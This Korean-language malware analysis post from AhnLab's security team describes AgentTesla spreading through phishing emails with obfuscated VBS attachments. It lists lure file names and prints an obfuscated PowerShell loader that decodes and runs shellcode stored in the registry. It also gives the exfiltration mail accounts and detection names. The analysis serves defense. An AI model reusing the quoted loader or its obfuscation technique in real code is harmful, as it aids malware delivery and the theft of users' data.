VBS를 통해 유포 중인 AgentTesla
ASEC 분석팀은 최근 악성 VBS 통해 AgentTesla가 유포되고 있음을 확인하였다. 스크립트 파일에는 다수의 코드가 여러 번 난독화 되어 있는 특징이 있다. AgentTesla는 지난 5월 윈도우 도움말 파일(*.chm)을 통한 유포가 확인된 이력이 있으며 지속적으로 유포 방식을 변경하고 있는 것으로 보인다.
윈도우 도움말 파일(*.chm)을 통해 유포 중인 AgentTesla – ASEC BLOG
ASEC 분석팀은 최근 AgentTesla 악성코드가 새로운 방식으로 유포 중인 정황을 포착하였다. ASEC 블로그에도 여러 번 소개해왔던 AgentTesla 의 기존 유포 방식은 파워포인트(*.ppt) 문서 내 악성 VBA 매크로를 이용하였다면, 새로운 유포 방식은 윈도우 도움말 파일(*.chm) 을 이용하여 powershell 명령어를 실행하는 것으로 확인하였다. 악성 CHM 파일은 운송 회사인 DHL 을 사칭한 피싱 메일에 첨부되어 압축 파일 형태로 유포되고 있다. DHL 외에도 다양한 주제로 피싱 메일을 유포하고 있어 사용자…
VBS 스크립트는 메일에 압축 파일 형태로 첨부되어 유포된다. 최근에는 국내 기업을 사칭한 유포 메일도 확인되었다.
압축파일 내부에는 VBS가 존재하며 유포 파일명으로 송장, 제안서 등의 파일명을 주로 사용한다. 확인된 파일명은 다음과 같다.
| 날짜 | 파일명 |
|---|---|
| 10/05 | doc_10049500220529464169750.pdf.vbs |
| 10/07 | doc_5246701207754814333490.vbs |
| 10/12 | № 106 – Supply of Flex.vbs protected copy of the commercial invoice.vbs |
| 10/12 | LJUR900225565_pdf.vbs |
| 10/13 | 770140578183.CL.NoticeOfArrival.vbs |
| 10/15 | Urgent RFQ No.6554342.vbs |
| 10/17 | JKTR002014953_5101075053_ppwk.vbs |
| 10/17 | Order List(Draft) 9419-PDF.vbs |
| 10/18 | BESOLO.vbs |
| 10/21 | BEST SOLU.vbs |
확인된 파일명
확인된 VBS 파일에는 주석과 더미 코드가 다수 존재한다.
다수의 주석과 더미 코드를 제외하면 코드 하단에 현재 실행된 VBS 파일에 있는 문자열을 2글자씩 제외하며 읽어 들이는 기능을 수행하는 코드가 확인된다.
해당 코드 실행 시 주석으로 있던 문자열이 디코딩 되어 새로운 스크립트 코드가 실행된다. 디코딩된 코드는 난독화된 쉘코드 및 추가 파워쉘 명령어를 포함하고 있다.
위 스크립트 코드 실행 시 난독화된 쉘코드인 ‘Ch8’의 값을 HKCU\Software\Basilicae17\Vegetates 에 저장한다.
이후 ‘O9’ 변수의 값을 파워쉘로 실행한다. ‘O9’ 변수에는 파워쉘 명령어가 저장되어 있으며, 실행되는 명령어는 다음과 같이 난독화되어 있다.
| powershell.exe “$Quegh = “””DatFMaruBidnMescFultkariStaoPtenKol EftHStaTBesBCel Uer{Taw fem Las Ude UndpLawaDokrSlaaQuamAsi(Uhj[DagSBontUnbrSkaiTilnHalgTis]Fes`$LivHPerSWir)Con;Fat Ret Hjl Amp Aft`$IntBLavySaltfaseBinsEno Che=Sax CenNDvdeDoswCyp-VovOShab <중략> Ind5Nin3Ree#Apo;”””;; Function Tammy159 { param([String]$HS); For($i=3; $i -lt $HS.Length-1; $i+=(3+1)){ $Statice = $Statice + $HS.Substring($i, 1); } $Statice;} $Ambulancetjeneste1820 = Tammy159 ‘UnsIPujEFolXInt ‘; $Ambulancetjeneste1821= Tammy159 $Quegh; & ($Ambulancetjeneste1820) $Ambulancetjeneste1821;; |
실행되는 파워쉘 명령어
파워쉘 코드는 ‘$Quegh’ 변수에 저장된 난독화된 값을 3글짜씩 제외하는 방식으로 디코딩한다. (ex. UnsIPujEFolXInt -> IEX)
디코딩된 명령어 역시 난독화되어 있으며 최종적으로 실행되는 코드는 다음과 같다.
앞서 HKCU\Software\Basilicae17\Vegetates에 저장하였던 난독화된 쉘코드를 base64로 디코딩하여 실행한다. 실행된 쉘코드는 정상 프로세스인 CasPol.exe에 AgentTesla 악성코드를 인젝션한다. AgentTesla는 정보 유출형 악성코드로 사용자 PC 정보를 수집하여 CO_[user명]/[PC명].zip으로 압축한 후 메일을 통해 유출한다.
사용되는 메일 정보는 다음과 같다.
- From : hasan@edp-bkv.com
- To : kingpentecost22@gmail.com
- pw : Fb56****65fr
AgentTesla는 주간 통계에서도 지속적으로 확인되는 악성코드로 유포 방식이 꾸준히 변화하고 있다. 또한, 쉘코드에 따라 AgentTesla 외에도 다양한 악성코드가 실행될 수 있어 주의가 필요하다.
[파일 진단]
Dropper/VBS.Generic.SC183860 (2022.10.14.02)
Downloader/VBS.Powershell (2022.10.17.02)
Trojan/VBS.Agent.SC183831 (2022.10.14.00)
Trojan/VBS.Obfuscated.SC183877 (2022.10.18.00)
AhnLab TIP를 구독하시면 연관 IOC 및 상세 분석 정보를 추가적으로 확인하실 수 있습니다. 자세한 내용은 아래 배너를 클릭하여 확인해보세요.
